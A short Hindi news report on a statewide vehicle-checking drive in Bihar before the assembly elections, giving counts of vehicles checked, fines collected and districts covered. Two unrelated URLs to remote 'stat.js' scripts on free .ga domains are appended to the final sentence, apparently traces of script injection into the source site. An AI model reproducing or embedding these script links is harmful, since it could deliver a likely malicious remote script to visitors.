बिहार में परिवहन विभाग पूरी तरह से सक्रिय हो गया है। हम सभी जानते हैं बिहार में विधानसभा चुनाव की तैयारी पूरे चरम सीमा पर है। इस दौरान परिवहन विभाग की तरफ से किए जा रहे हैं जांच अभियान में जिला परिवहन अधिकारी एसबीआई और ट्रैफिक पुलिस ने भी एक साथ काम कर रही है।
इस अभियान के तहत जो भी वाहन चालक बिना सीट बेल्ट या बिना हेलमेट के पकड़े जाते हैं तो उन पर त्वरित कार्यवाही की जा रही है। बीते दिन शनिवार को बिहार के लगभग सभी जिलों में वाहन जांच अभियान चलाया गया जो आगे भी जारी रहेगी। इस जांच अभियान में बिना सीट बेल्ट एवं हेलमेट के पाए जाने वाले वाहन चालकों पर त्वरित कार्यवाही करते हुए उनका ई चालान किया जा रहा है।
आंकड़े के मुताबिक शनिवार को पूरे बिहार में 1342 वाहनों की जांच की गई है जिसमें 467 वाहन मालिकों से जुर्माना भी वसूला गया है। वसूले गए जुर्माने की राशि 13 लाख बताई गई है। इस अभियान से एक और सबसे बड़ा फायदा यह है कि इसके वजह से बिहार में सड़क दुर्घटनाओ में काफी हद तक कमी दर्ज की गई है।
यह अभियान शहर में ही नहीं बल्कि राष्ट्रीय राजमार्ग यानी नेशनल हाईवे और एसएच यानी राज्यीय मार्ग पर भी चलाया जा रहा है। बीते शनिवार को बिहार के पटना जिले गोपालगंज सिवान छपरा भागलपुर मुजफ्फरपुर गया एवं अन्य जिलों में यह अभियान तेजी से चलाया जा रहा है। इस दौरान विभाग सभी पकडे गए वाहनों का हैंड हेल्ड डिवाइस के मदद से इ-चालान दिया जा रहा है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms